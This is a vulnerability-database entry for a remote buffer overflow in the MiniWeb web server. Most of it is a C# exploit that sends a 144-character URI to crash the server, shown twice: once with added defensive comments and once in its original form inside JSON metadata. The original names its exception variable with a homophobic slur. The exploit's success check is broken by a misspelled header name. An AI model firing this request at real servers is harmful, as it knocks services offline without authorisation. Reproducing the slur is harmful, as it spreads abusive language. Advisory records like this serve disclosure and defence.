Description
################### Miniweb Remote Buffer Overflow ############################
########By: e.wiZz!
########Site: www.balcansecurity.com
######## Found with ServMeNot (world's sexiest fuzzer :P )
In the wild...
#################################################################
/* Buffer overflow (BoF) when the requested URI is longer than roughly 120 characters; the request below uses 144. */
using System;
using System.IO;
using System.Net;
using System.Text;
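namespace idiot
{
    /// <summary>
    /// Console check for the MiniWeb URI-length overflow described in this advisory:
    /// it sends a single HTTP request whose path is 144 '/' characters and reports
    /// whether the server still answered.
    /// </summary>
    /// <remarks>
    /// The advisory places the overflow at URIs longer than roughly 120 characters.
    /// For a defender, the observable is therefore an unusually long request path
    /// reaching the MiniWeb listener; a request-line length limit enforced in front
    /// of the server keeps such requests away from the vulnerable parser.
    /// </remarks>
    class pf
    {
        /// <summary>
        /// Reads a base URL from standard input, requests it with the over-long path
        /// appended, and prints the outcome to the console.
        /// </summary>
        /// <param name="args">Command-line arguments; not used.</param>
        static void Main(string[] args)
        {
            Console.Write("Enter host:\n");
            string site = Console.ReadLine();

            // 144 slashes: past the ~120-character URI length the advisory gives
            // as the point where the overflow occurs.
            string uri = new string('/', 144);

            try
            {
                HttpWebRequest request = (HttpWebRequest)HttpWebRequest.Create(site + uri);

                // Dispose the response so its connection is released; the original
                // never closed it.
                using (HttpWebResponse response = (HttpWebResponse)request.GetResponse())
                {
                    // Any response means the server survived the request.
                    // The header name is misspelled ("Content-Lenght"), so a server
                    // is not expected to send it; the lookup then yields an empty
                    // string and this comparison holds for practically any response.
                    if (response.GetResponseHeader("Content-Lenght") != "a")
                    {
                        Console.WriteLine("Exploit failed");
                    }
                }
            }
            catch (Exception ex)
            {
                // NOTE(review): this catch-all prints "Cannot connect" for every
                // failure alike -- a malformed host string, an unreachable host, an
                // HTTP error status, or a connection dropped mid-request -- so the
                // first line alone does not say which one happened; read the
                // exception message printed after it.
                Console.WriteLine("Cannot connect");
                Console.WriteLine("{0}", ex.Message);
            }
        }
    }
}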
{"id": "SECURITYVULNS:DOC:21671", "bulletinFamily": "software", "title": "Miniweb Buffer Overflow", "description": "################### Miniweb Remote Buffer Overflow ############################\r\n\r\n########By: e.wiZz!\r\n\r\n########Site: www.balcansecurity.com\r\n\r\n######## Found with ServMeNot (world's sexiest fuzzer :P )\r\n\r\n\r\n\r\nIn the wild...\r\n#################################################################\r\n\r\n/* BoF when requesting URI longer than 120~ */\r\n\r\nusing System;\r\nusing System.IO;\r\nusing System.Net;\r\nusing System.Text;\r\n\r\nnamespace idiot\r\n{\r\n class pf\r\n {\r\n static void Main(string[] args)\r\n {\r\n Console.Write("Enter host:\n");\r\n string site = Console.ReadLine();\r\n string uri = null;\r\n try\r\n {\r\n for (int i = 0; i < 144; i++) { uri += "/"; }\r\n HttpWebRequest request = (HttpWebRequest)\r\n HttpWebRequest.Create(site + uri);\r\n HttpWebResponse response = (HttpWebResponse)\r\n\r\n request.GetResponse();\r\n\r\n //any response we get means that exploit failed\r\n if (response.GetResponseHeader("Content-Lenght") != "a")\r\n {\r\n Console.WriteLine("Exploit failed");\r\n }\r\n\r\n }\r\n catch (Exception gayexception)\r\n {\r\n Console.WriteLine("Cannot connect");\r\n Console.WriteLine("{0}", gayexception.Message);\r\n }\r\n }\r\n }\r\n}", "published": "2009-04-16T00:00:00", "modified": "2009-04-16T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:21671", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:30", "edition": 1, "viewCount": 10, "enchantments": {"score": {"value": 0.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:9842"]}], "rev": 4}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:9842"]}]}, "exploitation": null, "vulnersScore": 0.3}, "affectedSoftware": [], 
"immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645341512, "score": 1659803227}, "_internal": {"score_hash": "251b4e68b243eb81272d7e982d4c6b7b"}}
{}